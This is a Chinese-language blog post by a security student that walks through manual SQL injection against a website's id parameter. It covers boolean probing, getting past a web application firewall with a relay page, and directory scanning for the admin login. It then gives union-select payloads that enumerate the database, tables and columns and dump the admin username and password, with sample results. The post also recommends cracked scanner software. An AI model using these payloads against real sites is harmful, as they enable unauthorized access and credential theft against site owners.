您好,登錄后才能下訂單哦!
本人是一名***新手,信息安全專業的學生一直在學習關于安全方面的理論學習,主要進行的是網站的搭建,但自從接觸了web***之后才發現自己以前搭建的網站真是漏洞百出,從而也愛上了***的學習,今天就和大家分享一下我的學習成果,有什么不好的地方歡迎大家提意見!
今天主要是講一講sql注入,sql注入的原理和危害就不多說了,大家百度一下就可以了,給大家講一講我的實踐經驗。
sql注入的方法(get參數)
說復雜了沒用其實就兩種,工具注入與手工注入
(一)選擇網站是否能進行sql注入(一般使用火狐瀏覽器比較好——方便)
(1)先查看URL頁面為http://xxx.com/xxx/id=23 這樣的頁面或者為偽靜態的url也可進行注入。 ·
(2)在url后輸入
and 1=1返回頁面正常
and 1=2返回頁面錯誤
or 1=1返回頁面錯誤
or 1=2返回頁面正常
這樣的網站就有注入漏洞
現在的網站基本都有網站防火墻(帶有防sql注入功能)這時可用‘工具注入中轉生成器’來重新生成一個頁面(注意打開這個頁面要用iis或小旋風),這樣就可以繞過網站安全狗了。
然后在新生成頁面進行操作。
and 1=1返回頁面正常
and 1=2返回頁面錯誤
or 1=1返回頁面錯誤
or 1=2返回頁面正常
這樣就可以進行下一步了。
(一)個人經驗一般應先進行目錄的掃描,為什么呢?
因為先應該找到網站后臺的登錄界面,如果連登陸界面都無法找到,就算知道了管理員的用戶 名密碼又有什么用呢。
可以手工查找,就是猜名稱,一般為admin|login|user等asp、php、aspx、jsp后綴的,這種方 法有點傻,一般用工具進行網站遍歷。
掃描工具:工具在附件里都有。我一般先使用御劍的掃描工具,但御劍的歲數畢竟不小了,也 沒有后續的更新,所以有些網站目錄是無法遍歷出來的,這是只能用一些牛逼的工具了。工具burpsuite(都說是***神器,我也一直在用,功能挺強大的,可以進行網站爬行與網站目錄的遍歷)還有就是Acunetix Web Vulnerability Scanner這款軟件也是非常強大的,現在出到10了,網上破解版。具體使用教程請自行百度。
(二)進行注入
可用工具啊D、明小子、pangolin穿山甲、sqlmap等工具進行注入,今天主要講解手工注入。
手工注入:
1、order by 1.....100判斷表數
若頁面返回正常則說明這個數字小于表數,依次遞加,最好取中進行測試節省時間,最后一個 正確的為表數,如20正常,21不正常,則表數為20
2、 http://xxx.com/xxx.php?id=23 and 1=2 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20
顯示3,7數字
3、 將3或7替換為database()、version()、user()、@@version——compile_os
報基本信息 (1)database():數據庫名-------abc
(2)version():數據庫版本--------5.1.63-community
(3)user():數據庫用戶----------shsjk@localhost
(4)@@version——compile_os:操作系統--------win32
4、表名查詢 http://xxx/xxx.php?id=23 and 1=2 UNION SELECT 1,2,group_concat(table_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20from information_schema.tables where table_schema=0x616263(此處為數據庫名,可用小葵 轉換工具轉換為Hex值)
查詢結果為:wz_jj_admin,wz_jj_article,wz_jj_p_w_upload,wz_jj_class,wz_jj_en_admin,wz_jj_en_article,wz_jj_en_p_w_upload,wz_jj_en_class,wz_jj_en_key,wz_jj_en_links,wz_jj_en_message,wz_jj_key,wz_jj_links,wz_jj_message
5、分析表wz_jj_admin 查找表的列名
http://xxx.com/xxx.php?id=23 and 1=2 UNION SELECT 1,2,group_concat(column_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from information_schema.columns where table_name=0x777A5F6A6A5F61646D696E
結果為:uid , ad_username,ad_password,ad_power,ad_intro
6、查找用戶名,密碼http://xxx.com/xxx.php?id=23 and 1=2 UNION SELECT 1,2,group_concat(ad_username,0x5c,ad_password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from wz_jj_admin
7、結果為:admin admin888 這樣就成功了
這只是簡單的sql注入,后續的參數注入有post注入、cookie注入,請耐心等待!
免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。